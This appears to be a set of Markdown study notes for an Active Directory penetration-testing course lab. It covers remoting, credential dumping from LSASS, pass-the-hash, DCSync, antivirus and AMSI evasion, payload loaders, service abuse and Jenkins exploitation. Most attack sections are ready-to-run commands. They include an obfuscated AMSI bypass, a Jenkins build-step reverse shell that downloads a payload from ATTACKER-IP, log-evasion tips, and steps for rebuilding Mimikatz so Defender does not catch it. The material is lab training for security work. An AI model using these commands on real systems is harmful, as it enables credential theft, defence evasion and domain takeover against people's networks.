Is Stateful 19 | 20 | 21 | > **Note :** When you PSRemote to a machine it is not a powershell process that runs on the machine, it is a process called the **wsmprovhost** that spins up on the target machine 22 | 23 | 24 | - Useful cmdlets 25 | 26 | ```powershell 27 | $ New-PSSession 28 | $ Enter-PSSession 29 | ``` 30 | 31 | 32 | **_Example_** 33 | 34 | As shown below we have administrative access on the current `dcorp-adminsrv` machine, this is how we can access the machine where we have administrative access using **Power Shell Remoting** 35 | 36 | 37 | ![](https://i.imgur.com/ERPf5mM.png) 38 | 39 | 40 | 41 | 42 | - Then run 43 | 44 | ```powershell 45 | $ exit 46 | $ $adminsrv = NewPSSession dcorp-adminsrv 47 | $ $adminsrv 48 | ``` 49 | 50 | 51 | **_Example_** 52 | 53 | 54 | ![](https://i.imgur.com/72tbr19.png) 55 | 56 | 57 | > **Pros and Cons :** If we have permissions to move laterally from our machine to like 10,000 machines the **One-to-one** might not work, because we have to do it manually but with the **One-to-Many**, we can actually move easily 58 | 59 | - [ ] **One-to-Many** 60 | - Also known as Fan-out remoting. 61 | - Non-interactive 62 | - Executes commands parallely 63 | - Useful cmdlets 64 | 65 | ```powershell 66 | $ Invoke-Command 67 | ``` 68 | 69 | 70 | - Run commands and scripts on 71 | - multiple remote computers, 72 | - in disconnected sessions (v3) 73 | - as background job and more. 74 | - The best thing in powershell for passing the hashes, using credentials and executing commands on multiple remote computers. 75 | - Use `-Credential` parameter to pass **username/password**. 76 | 77 | 78 | 79 | - Use below to execute commands or scriptblocks (This will execute the `Get-Process` command on each machine): 80 | 81 | ```powershell 82 | $ Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content ) 83 | ``` 84 | 85 | 86 | 87 | - Use below to execute scripts from files 88 | 89 | ```powershell 90 | $ Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content ) 91 | ``` 92 | 93 | 94 | - Use below to execute locally loaded function on the remote machines: 95 | 96 | 97 | ```powershell 98 | $ Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) 99 | ``` 100 | 101 | - In this case, we are passing Arguments. Keep in mind that only positional arguments could be passed this way: 102 | 103 | ```powershell 104 | $ Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content ) -ArgumentList 105 | ``` 106 | 107 | 108 | **_Example Usage_** -: 109 | 110 | 111 | Run the `whoami` and `hostname` command on the `$adminsrv` server 112 | 113 | 114 | ![](https://i.imgur.com/SniQryf.png) 115 | 116 | 117 | - Use below to execute "Stateful" commands using Invoke-Command: 118 | 119 | ```powershell 120 | $ $Sess = New-PSSession -Computername Server1 Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process} Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name} 121 | ``` 122 | 123 | 124 | 125 | ## **PowerShell Remoting - Tradecraft** 126 | 127 | 128 | - PowerShell remoting supports the system-wide transcripts and deep script block logging. 129 | - We can use winrs in place of PSRemoting to evade the logging (and still reap the benefit of 5985 allowed between hosts): 130 | 131 | ```powershell 132 | winrs -remote:server1 -u:server1\administrator - 133 | p:Pass@1234 hostname 134 | ``` 135 | 136 | - We can also use winrm.vbs and COM objects of WSMan object - https://github.com/bohops/WSMan-WinRM 137 | 138 | 139 | 140 | # **Lateral Movement - Invoke-Mimikatz** 141 | 142 | 143 | - Mimikatz can be used to dump credentials, tickets, and many more interesting attacks! 144 | - Invoke-Mimikatz, is a PowerShell port of Mimikatz. Using the code from `ReflectivePEInjection`, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script. 145 | - The script needs administrative privileges for dumping credentials from local machine. Many attacks need specific privileges which are covered while discussing that attack. 146 | 147 | 148 | 149 | ## **Lateral Movement - Extracting Credentials from LSASS** 150 | 151 | All needs **Local Admin Access** 152 | 153 | - Dump credentials on a local machine using Mimikatz 154 | 155 | ```powershell 156 | $ Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 157 | ``` 158 | 159 | 160 | - Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz) 161 | 162 | ```powershell 163 | $ SafetyKatz.exe "sekurlsa::ekeys" 164 | ``` 165 | 166 | 167 | - Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality). 168 | 169 | ```powershell 170 | $ SharpKatz.exe --Command ekeys 171 | ``` 172 | 173 | 174 | 175 | - Dump credentials using Dumpert (Direct System Calls and API unhooking) 176 | 177 | 178 | ```powershell 179 | $ rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump 180 | ``` 181 | 182 | 183 | - Using pypykatz (Mimikatz functionality in Python) 184 | 185 | ```powershell 186 | $ pypykatz.exe live lsa 187 | ``` 188 | 189 | 190 | - Using comsvcs.dll (Very aggressively detected) 191 | 192 | ```powershell 193 | $ tasklist /FI "IMAGENAME eq lsass.exe" rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Public\lsass.dmp full 194 | ``` 195 | 196 | 197 | 198 | - From a Linux attacking machine using `impacket`. 199 | - From a Linux attacking machine using `Physmem2profit` 200 | 201 | 202 | > **Note :** Anything that interact with LSASS has higher chances of detection, so before trying to extract credentials from LSASS we can try to lookup other revenues e.g powershell console history, Local SAM hives, Credential Notes etc. 203 | 204 | 205 | ## **Lateral Movement - OverPass-The-Hash** 206 | 207 | 208 | - Over Pass the hash (OPTH) generate tokens from hashes or keys. Needs elevation (Run as administrator) 209 | 210 | - Using `Mimikatz` 211 | 212 | ```powershell 213 | $ Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256: /run:powershell.exe"' 214 | ``` 215 | 216 | - Using `SafetyKatz` 217 | 218 | ```powershell 219 | $ SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit" 220 | ``` 221 | 222 | 223 | - The above commands starts a PowerShell session with a logon type 9 (same as runas /netonly). 224 | 225 | ## **Lateral Movement - OverPass-The-Hash** 226 | 227 | - Over Pass the hash (OPTH) generate tokens from hashes or keys. 228 | 229 | - Below doesn't need elevation (Will overwrite current TGT) 230 | 231 | 232 | ```powershell 233 | $ Rubeus.exe asktgt /user:administrator /rc4: /ptt 234 | ``` 235 | 236 | 237 | - Below command needs elevation. 238 | 239 | 240 | ```powershell 241 | $ Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 242 | ``` 243 | 244 | 245 | 246 | ## **Lateral Movement - DCSync** 247 | 248 | 249 | - To extract credentials from the DC without code execution on it, we can use DCSync. 250 | - To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain: 251 | 252 | 253 | ```powershell 254 | $ Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"' SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit" 255 | ``` 256 | 257 | - By default, Domain Admins privileges are required to run DCSync. 258 | 259 | 260 | 261 | # **Offensive .NET - Introduction** 262 | 263 | 264 | 265 | - Currently, .NET lacks some of the security features implemented in System.Management.Automation.dll. 266 | - Because of this, many Red teams have included .NET in their tradecraft. 267 | - There are many open source Offensive .NET tools and we will use the ones that fit our attack methodology. 268 | - When using .NET (or any other compiled language) there are some challenges 269 | - Detection by countermeasures like AV, EDR etc. 270 | - Delivery of the payload (Recall Powershell's sweet download-execute cradles) 271 | - Detection by logging like process creation logging, command line logging etc 272 | - We will address the AV detection and delivery of the payload as and when required. 273 | - The course instructor says we are on our own when the binaries that they share start getting detected by windows Defender :), They don't know i do pentest 🤫 (Forever loud!!!) 274 | - We will focus mostly on bypass of signature based detection by windows defender. 275 | - For that, we can use techniques like obfuscation, String Manipulation etc 276 | - We can use `DefenderCheck` (https://github.com/matterpreter/DefenderCheck) to identify code and strings from a binary that windows defender may flag. 277 | - This helps us in deciding on modifying the source code and minimal obfuscation. 278 | 279 | ## **Offensive .NET - Tradecraft - AV bypass - DefenderCheck** 280 | 281 | 282 | - Let's check SharpKatz.exe for signatures using DefenderCheck 283 | 284 | 285 | ```powershell 286 | $ DefenderCheck.exe 287 | ``` 288 | 289 | 290 | 291 | **_Example_** -: 292 | 293 | 294 | ![](https://i.imgur.com/TkcfMJY.png) 295 | 296 | 297 | ## **Using DefenderCheck Output to Manipulate strings** 298 | 299 | 300 | - Generally it is a practice of trial and error, we keep replacing strings gotten form `DefenderCheck` output till AV doesn't detect it 🥏, here is an example bypass 301 | 302 | 303 | ![](https://i.imgur.com/MegfEKj.png) 304 | 305 | 306 | ## **Offensive .NET - Tradecraft - AV bypass - String Manipulation** 307 | 308 | 309 | - [ ] For safetyKatz, we used the following steps 310 | - Download latest version of Mimikatz and Out-CompressedDll.ps1 311 | - Run the Out-CompressedDll.ps1 PowerShell script on Mimikatz binary and save the output to a file 312 | 313 | ```powershell 314 | $ Out-CompressedDll > outputfilename.txt 315 | ``` 316 | 317 | - Copy the value of the variable "`$EncodedCompressedFile`" from the output file (`outputfilename.txt`) above and replace the value of "`compressedMimikatzString`" variable in the "`Constants.cs`" file of **SafetyKatz**. 318 | 319 | 320 | ![](https://i.imgur.com/1EinKFj.png) 321 | 322 | 323 | - Copy the byte size from the output file (`outputfilename.txt`) and replace it in "`Program.cs`" file of **SafetyKatz** on the line 111 & 116. 324 | - Build and recheck the binary with `DefenderCheck`. 325 | 326 | 327 | ![](https://i.imgur.com/Yr4pM6x.png) 328 | 329 | 330 | 331 | 332 | ## **Offensive .NET - Tradecraft - AV bypass - BetterSafetyKatz** 333 | 334 | - [ ] For BetterSafetyKatz, we used the following steps 335 | - Download the latest release of "mimikatz_trunk.zip" file. 336 | - Convert the file to **Base64** value 337 | 338 | ![](https://i.imgur.com/iLqskcG.png) 339 | 340 | 341 | - Modify the "`Program.cs`" file. 342 | - Added a new variable that contains the base64 value of "mimikatz_trunk.zip" file. 343 | - Comment the code that downloads or accepts the mimikatz file as an argument. 344 | - Convert the base64 string to bytes and pass it to "zipStream" variable. 345 | 346 | 347 | ![](https://i.imgur.com/MwCMxQN.png) 348 | 349 | 350 | 351 | ## **Offensive .NET - Tradecraft - AV bypass - Obfuscation** 352 | 353 | 354 | 355 | - For Rubeus.exe, we used ConfuserEx (https://github.com/mkaring/ConfuserEx) to obfuscate the binary 356 | 357 | ![](https://i.imgur.com/mdkEh2t.png) 358 | 359 | 360 | **Usage** -: 361 | 362 | 363 | - Launch ConfuserEx 364 | - In Project tab select the Base Directory where the binary file is located. 365 | - In Project tab Select the Binary File that we want to obfuscate. 366 | - In Settings tab add the rules. 367 | - In Settings tab edit the rule and select the preset as `Normal`. 368 | - In Protect tab click on the protect button. 369 | - We will find the new obfuscated binary in the Confused folder under the Base Directory. 370 | 371 | 372 | ![](https://i.imgur.com/FwiuSFo.png) 373 | 374 | 375 | ## **Offensive .NET - Tradecraft - Payload Delivery** 376 | 377 | 378 | - We can use NetLoader (https://github.com/Flangvik/NetLoader) to deliver our binary payloads. 379 | - It can be used to load binary from filepath or URL and patch AMSI & ETW while executing. 380 | 381 | 382 | ```powershell 383 | $ C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe 384 | ``` 385 | 386 | 387 | - We also have AssemblyLoad.exe that can be used to load the Netloader in-memory from a URL which then loads a binary from a filepath or URL. 388 | 389 | 390 | ```powershell 391 | $ C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe 392 | ``` 393 | 394 | 395 | # **Learning Objective 7** 396 | 397 | 398 | - Identify a machine in the target domain where a Domain Admin session is available. 399 | - Compromise the machine and escalate privileges to Domain Admin 400 | - Using access to `dcorp-ci` 401 | - Using derivative local admin 402 | 403 | 404 | ## **Solution** 405 | 406 | **_Coming Soon_** 407 | 408 | 409 | -------------------------------------------------------------------------------- /Local Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | ~ 3 | --- 4 | # **Local Privilege Escalation** 5 | 6 | There are various ways of locally escalating privileges on windows box -: 7 | - Missing patches 8 | - Automated deployment and Auto Logon passwords in clear text 9 | - AlwaysInstallElevated (Any user can run MSI as SYSTEM) 10 | - Misconfigured Services 11 | - DLL Hijacking and more 12 | - NTLM Relaying a.k.a won't fix 13 | 14 | 15 | We can use below tools for complete coverage 16 | 17 | 18 | - PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 19 | - PrivEsc - https://github.com/enjoiz/Privesc 20 | - WinPEAS - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/ 21 | 22 | # Service Issues using `PowerUp` 23 | 24 | - Get services with unquoted paths and a space in their name 25 | 26 | 27 | ```powershell 28 | $ Get-ServiceUnquoted -Verbose 29 | ``` 30 | 31 | 32 | 33 | - Get services where the current user can write to its binary or change arguments to the binary 34 | 35 | ```powershell 36 | $ Get-ModifiableServiceFile -Verbose 37 | ``` 38 | 39 | 40 | 41 | - Get the services whose configuration current user can modify 42 | 43 | ```powershell 44 | $ Get-ModifiableService -Verbose 45 | ``` 46 | 47 | 48 | 49 | We can also automate this by using the below commands 50 | 51 | 52 | ```powershell 53 | # For Powerup 54 | $ Invoke-AllChecks 55 | 56 | # For PrivEsc 57 | $ Invoke-PrivEsc 58 | 59 | # For PEASS-ng 60 | $ winPEASx64.exe 61 | ``` 62 | 63 | ``` 64 | # Add users to a local group by abusing the services where users can change arguments to the binary: 65 | https://powersploit.readthedocs.io/en/latest/Privesc/Invoke-ServiceAbuse/ 66 | ``` 67 | 68 | **Feature Abuse** 69 | 70 | • What we have been doing up to now (and will keep doing further in the 71 | class) is relying on features abuse. 72 | • Features abuse are awesome as there are seldom patches for them and 73 | they are not the focus of security teams! 74 | • One of my favorite features abuse is targeting enterprise applications 75 | which are not built keeping security in mind. 76 | • On Windows, many enterprise applications need either Administrative 77 | privileges or SYSTEM privileges making them a great avenue for privilege 78 | escalation. 79 | 80 | **Example - Jenkins -:** 81 | 82 | 83 | • Let’s use an older version of Jenkins as an example of vulnerable 84 | Enterprise application. 85 | • Jenkins is a widely used Continuous Integration tool. 86 | • There are many interesting aspects with Jenkins but for now we would 87 | limit our discussion to the ability of running system commands on 88 | Jenkins. 89 | • There is a Jenkins server running on dcorp-ci (172.16.3.11) on port 90 | 8080. 91 | 92 | **Exploit -:** 93 | 94 | - If we have admin access (default installation before 2.x) 95 | - Navigate to `http:// $sout err> $serr" 104 | ``` 105 | 106 | 107 | 108 | - If you don't have admin access but could add or edit build steps in the build configuration. 109 | - Add a build step, Navigate to `/job/Project0/configure` (If you get a `403` keep changing Project0 to Project1, Pro...2, ..........3 till you get a `200`) 110 | - Scroll down to the option "**Build steps**" and on the drop down select/add "**Execute Windows Batch Command**" and enter-: 111 | 112 | ```powershell 113 | powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443 114 | ``` 115 | 116 | - Now we can go ahead and start up a listener with netcat using the `netcat.exe` version to listen on the specified port 117 | 118 | ```bat 119 | C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 120 | ``` 121 | 122 | - Also we need to host our `Invoke-PowerShellTcp.ps1` script as stated in the payload, we can use a tool called **HTTP File Server (HFS)** or just try to google what works for you (Drag and drop the `Invoke-PowerShellTcp.ps1` to the left pane ) 123 | 124 | 125 | ![](https://i.imgur.com/0MnoHoT.png) 126 | 127 | - We also need to turn off windows firewall for this to work, so do that also 128 | 129 | 130 | ![](https://i.imgur.com/ksH2Ukn.png) 131 | 132 | 133 | 134 | 135 | - Again, you could download and execute scripts, run encoded scripts and more. 136 | 137 | 138 | > **General Note :** Many users use their username as password so make sure to try something like `manager:manager` 139 | 140 | 141 | 142 | # **Learning Objective 5** 143 | 144 | 145 | - Exploit a service on dcorp-studentx and elevate privileges to local administrator. 146 | - Identify a machine in the domain where studentx has local administrative access. 147 | - Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server 148 | 149 | 150 | ## **Solution** 151 | 152 | 153 | **_Coming Soon_** 154 | 155 | > **Note :** Renaming a local admin account might be recommended but renaming a domain admin account is not recommended, THEY can still detect you are Admin, by your **SID** 🙂. 156 | 157 | 158 | 159 | 160 | 161 | -------------------------------------------------------------------------------- /Methodology.md: -------------------------------------------------------------------------------- 1 | 2 | # **Things to take note Of** 3 | 4 | - Remember to turn off or add an exception to your student VM's firewall when you run a listener for a reverse shell. 5 | - The `C:\` directory is exempted from Windows Defender, but AMSI may detect some tools when you load them. 6 | - Use the following to Bypass AMSI after loading invisi-shell -: 7 | 8 | 9 | ```powershell 10 | S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 11 | ``` 12 | 13 | - You would need to turn off Tamper Protection on the student VM after getting user shell or performing local privilege escalation (Check Google on how to do this) 14 | - Sometimes you need to click **"Enter"** key on your keyboard to see result of commands like netcat, rubeus, mimikatz etc 15 | - If most attacks most especially in domain persistence don't work, just **reboot student VM**, you must have created a lot of tickets 😭 16 | 17 | 18 | # **Things to do once you have a User First** 19 | 20 | 21 | - Start a PowerShell session using Invisi-Shell to avoid enhanced logging 22 | 23 | 24 | ```powershell 25 | # do this on MS-DOS 26 | C:\users\studentx> cd \AD\Tools 27 | 28 | C:\users\studentx> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat 29 | 30 | # You should now have a powershell seesion 31 | ``` 32 | 33 | - Use the AMSI Bypass payload now 34 | - Load `PowerView` in the PowerShell session. 35 | 36 | 37 | ```powershell 38 | . C:\AD\Tools\PowerView.ps1 39 | ``` 40 | 41 | 42 | 43 | # **Enumeration** 44 | 45 | > [!bug] **Learning Objective 1** 46 | > - Enumerate following for the dollarcorp domain : 47 | > - Users 48 | > - Computers 49 | > - Domain Administrators 50 | > - Enterprise Administrators 51 | > - Shares 52 | > # Solution -: 53 | 54 | ### **Users** 55 | 56 | ```powershell 57 | # Powerview (both are same command) 58 | # One just shows you logoncount to detect decoy accounts 59 | 60 | Get-DomainUser -Properties samaccountname,logonCount 61 | Get-DomainUser | select -ExpandProperty samaccountname 62 | ``` 63 | 64 | 65 | ### **Computers** 66 | 67 | 68 | ```powershell 69 | # powerview 70 | # shows username, equivalent to the whoami command 71 | Get-DomainComputer | select Name 72 | 73 | # shows domain network name, equivalent to the hostname command 74 | Get-DomainComputer | select -ExpandProperty dnshostname 75 | ``` 76 | 77 | 78 | 79 | 80 | ### **Domain Admins** 81 | 82 | 83 | ```powershell 84 | # powerview 85 | Get-DomainGroupMember -Identity "Domain Admins" -Recurse 86 | 87 | # The most important piece of information from the output is (Note Down) -: 88 | # MemeberName 89 | # MemeberSID 90 | ``` 91 | 92 | 93 | 94 | ### **Enterprise Admin** 95 | 96 | 97 | 98 | ```powershell 99 | # powerview 100 | Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse 101 | 102 | # If you don't get any output after the above command note that 103 | # We need to query the root domain as Enterprise Admins group is present only in # the root of a forest. 104 | 105 | Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local 106 | 107 | # Also note down MemberName and MemberSID 108 | ``` 109 | 110 | 111 | 112 | 113 | ### **Shares** 114 | 115 | 116 | 117 | ```powershell 118 | # powerview 119 | Invoke-ShareFinder -Verbose 120 | 121 | # See content of provided shares 122 | # dir "\\dcorp-std520.dollarcorp.moneycorp.local\ADMIN$\" 123 | dir "\\dnshostname\sharename" 124 | ``` 125 | 126 | 127 | 128 | > [!bug] **Learning Objective 2** 129 | > - Enumerate following for the dollarcorp domain 130 | > - List all the OUs 131 | > - List all the computers in the StudentMachines OU. 132 | > - List all the GPOs 133 | > - Enumerate GPO applied on the StudentMachines OU 134 | > # Solution -: 135 | 136 | ### **List All Organizational Units** 137 | 138 | 139 | ```powershell 140 | # powerview 141 | Get-DomainOU 142 | 143 | # Use the -Properties option to filter out just the name 144 | Get-DomainOU -Properties Name 145 | ``` 146 | 147 | 148 | ### **List all the computers in {the/An} {StudentMachines OU/OU}** 149 | 150 | 151 | ```powershell 152 | # powerview 153 | # Get OU name first 154 | Get-DomainOU -Properties Name 155 | 156 | # Then list all computers 157 | (Get-DomainOU -Identity ).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name 158 | ``` 159 | 160 | 161 | 162 | 163 | ### **List all the GPOs** 164 | 165 | 166 | 167 | ```powershell 168 | # powerview 169 | Get-DomainGPO 170 | ``` 171 | 172 | 173 | 174 | 175 | ### **Enumerate GPO applied on the StudentMachines OU** 176 | 177 | 178 | ```powershell 179 | # powerview 180 | # Get OU name first 181 | Get-DomainOU -Properties Name 182 | 183 | # Grab identity on specific OU name 184 | Get-DomainOU -Identity StudentMachines 185 | # copy the "gplink" property where you have "LDAP//:cn={Copy-This}" 186 | 187 | # Get GPO applied 188 | Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}' 189 | ``` 190 | 191 | 192 | > [!bug] **Learning Objective 3** 193 | > - Enumerate following for the dollarcorp domain: 194 | > - ACL for the Users group 195 | > - ACL for the Domain Admins group 196 | > - All modify rights/permissions for the student 197 | > # Solution -: 198 | 199 | 200 | 201 | 202 | ### **ACL for the Users group** 203 | 204 | 205 | ```powershell 206 | # powerview 207 | Get-DomainObjectAcl -Identity "Users" -ResolveGUIDs -Verbose 208 | ``` 209 | 210 | 211 | 212 | ### **ACL for the Domain Admins group** 213 | 214 | 215 | ```powershell 216 | Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose 217 | ``` 218 | 219 | 220 | 221 | ### **All modify rights/permissions for the student** 222 | 223 | 224 | ```powershell 225 | # powerview 226 | Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student505"} 227 | ``` 228 | 229 | 230 | 231 | ### **ActiveDirectory Rights for RDPUsers group** 232 | 233 | 234 | 235 | ```powershell 236 | Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} 237 | ``` 238 | 239 | 240 | 241 | > [!bug] **Learning Objective 4** 242 | > - Enumerate all domains in the moneycorp.local forest. 243 | > - Map the trusts of the dollarcorp.moneycorp.local domain. 244 | > - Map external trust in the moneycorp.local forest. 245 | > - Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest ? 246 | > # Solution -: 247 | 248 | ### **Get all domains in the current forest** 249 | 250 | 251 | 252 | ```powershell 253 | Get-ForestDomain -verbose 254 | 255 | # The "Name:" property are the domain names 256 | # Or just filter by Name 257 | Get-ForestDomain -verbose | select Name 258 | ``` 259 | 260 | 261 | ### **Map the trusts of All Domain** 262 | 263 | 264 | ```powershell 265 | # Powerview 266 | Get-DomainTrust 267 | 268 | # Map the trust of a domain 269 | Get-ForestDomain -verbose | select Name 270 | Get-DomainTrust -Domain us.dollarcorp.moneycorp.local 271 | 272 | # Ouput you should look out for -: 273 | # SourceName 274 | # TargetName 275 | # TrustAttributes 276 | # TrustDirection 277 | ``` 278 | 279 | 280 | 281 | ### **Map external trust in The moneycorp.local forest** 282 | 283 | 284 | ```powershell 285 | Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"} 286 | ``` 287 | 288 | 289 | 290 | 291 | ### **Identify external trusts of the dollarcorp domain** 292 | 293 | 294 | 295 | ```powershell 296 | Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"} 297 | ``` 298 | 299 | 300 | ### **Trust Direction for the trust between dollarcorp.moneycorp.local and eurocorp.local** 301 | 302 | 303 | ```powershell 304 | # If the "TrustDirection" output of the previous command is either bi-directional trust or one-way trust 305 | # Then we can use the below command 306 | 307 | Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name} 308 | ``` 309 | 310 | 311 | 312 | ![](https://i.imgur.com/bIp4vE2.png) 313 | 314 | 315 | 316 | 317 | # **Local Privilege Escalation** 318 | 319 | 320 | 321 | > [!bug] **Learning Objective 5** 322 | > - Exploit a service on dcorp-studentx and elevate privileges to local administrator. 323 | > - Identify a machine in the domain where studentx has local administrative access. 324 | > - Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server 325 | > # Solution -: 326 | 327 | 328 | 329 | 330 | ### **Get services with unquoted paths and a space in their name {Exploit}** 331 | 332 | 333 | - Cd to `C:\AD\Tools` 334 | - Load Invisi-shell 335 | - Load AMSI Bypass 336 | - Load `Powerup.ps1` script 337 | 338 | 339 | ```powershell 340 | . 'C:\Ad\Tools\PowerUp.ps1' 341 | ``` 342 | 343 | 344 | - Run the `Get-ServiceUnquoted` module to check for unquoted path 345 | 346 | 347 | ```powershell 348 | Invoke-AllChecks 349 | 350 | # Note down the "ServiceName:" with unquoted paths 351 | ``` 352 | 353 | 354 | - Then abuse function for `Invoke-ServiceAbuse` and add our current domain user to the local Administrators group 355 | 356 | 357 | ```powershell 358 | # -Name: Name of service to abuse 359 | # -Username: Name of current user, Just run the whoami cmd 360 | Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose 361 | ``` 362 | 363 | We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges! 364 | 365 | 366 | 367 | 368 | ### **Identify a machine in the domain where present user has local administrative access** 369 | 370 | 371 | 372 | - Cd to `C:\AD\Tools` 373 | - Load Invisi-shell 374 | - Load AMSI Bypass 375 | - Load `Find-PSRemotingLocalAdminAccess.ps1` script 376 | 377 | 378 | ```powershell 379 | . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1 380 | ``` 381 | 382 | 383 | 384 | 385 | 386 | - Fond local administrative access 387 | 388 | 389 | ```powershell 390 | Find-PSRemotingLocalAdminAccess 391 | ``` 392 | 393 | 394 | 395 | ![](https://i.imgur.com/6LJp7ia.png) 396 | 397 | 398 | 399 | - We can the connect to the machines found using `winrs` or `Enter-PSSession`(Powershell Remoting) 400 | 401 | 402 | 403 | ```powershell 404 | # winrs 405 | winrs -r:dcorp-adminsrv cmd 406 | set username 407 | set computername 408 | 409 | # powershell remoting 410 | Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.loca 411 | $env:username 412 | ``` 413 | 414 | 415 | 416 | ![](https://i.imgur.com/8ZevFtw.png) 417 | 418 | 419 | 420 | 421 | ### **Jenkins** 422 | 423 | 424 | - Navigate to the Jenkins instance `http://172.16.3.11:8080` 425 | - Log in with default credentials, in this case `build:build`, or check google for **default Jenkins credentials** 426 | - Turn off all windows firewall settings 427 | - Start up `hfs.exe` (HTTP File Server) located under `C:\AD\Tools\` 428 | - Navigate to `/job/Project0/configure` (If you get a `403` keep changing Project0 to Project1, Pro...2, ..........3 till you get a `200`) 429 | - Scroll down to the option "**Build steps**" and on the drop down select/add "**Execute Windows Batch Command**" and enter-: 430 | 431 | ```powershell 432 | powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443 433 | 434 | # Replace attacker IP with your IP Address, Run "ipconfig" to see it 435 | ``` 436 | 437 | - Start up your listener with `netcat.exe` 438 | 439 | ```powershell 440 | C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 441 | ``` 442 | 443 | 444 | - Hit **Apply** and then **Save** and on the left side bar, you should see a **Build Now** button, Click it. 445 | - You should then see your reverse shell as `dcorp-ci` 446 | 447 | 448 | 449 | ![](https://i.imgur.com/Hf381f0.png) 450 | 451 | 452 | 453 | 454 | 455 | # **Enumeration - Bloodhound** 456 | 457 | 458 | > [!bug] **Learning Objective 6** 459 | > - Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp domain. 460 | > # Solution -: 461 | 462 | 463 | 464 | 465 | **The Reason why this enumeration is coming after Local Privilege Escalation is because we need some administrative rights to run this type of enumeration** 466 | 467 | 468 | ### **BloodHound New Setup** 469 | 470 | - BloodHound uses **neo4j** graph database, so we need to setup that first. 471 | - Go ahead open this location on MS-DOS 472 | 473 | 474 | ```powershell 475 | cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin 476 | ``` 477 | 478 | 479 | - Install and start the neo4j service as follows: 480 | 481 | 482 | ```powershell 483 | .\neo4j.bat install-service 484 | .\neo4j.bat start 485 | ``` 486 | 487 | 488 | - Browse to the **neo4j** service on `localhost:7474/browser/` on your browser 489 | - Enter the username: **neo4j** and password: **neo4j**. 490 | - You also need to enter a new password. Let's use BloodHound as the new password. 491 | - We also need to power on bloodhound, change directory to : 492 | 493 | 494 | ```powershell 495 | cd C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64 496 | .\BloodHound.exe 497 | ``` 498 | 499 | 500 | 501 | - Provide **neo4j** username and password we crated earlier 502 | 503 | 504 | ``` 505 | bolt://localhost:7687 506 | 507 | Username: neo4j 508 | Password:bloodhound 509 | ``` 510 | 511 | 512 | - Now since we have local administrator privileges, go ahead and turn off antivirus (Both **Real time protection** and **Tamper Protection**) using GUI 513 | - Open another powershell session with local administrative privileges and load **Invisi-shell** 514 | 515 | 516 | ```powershell 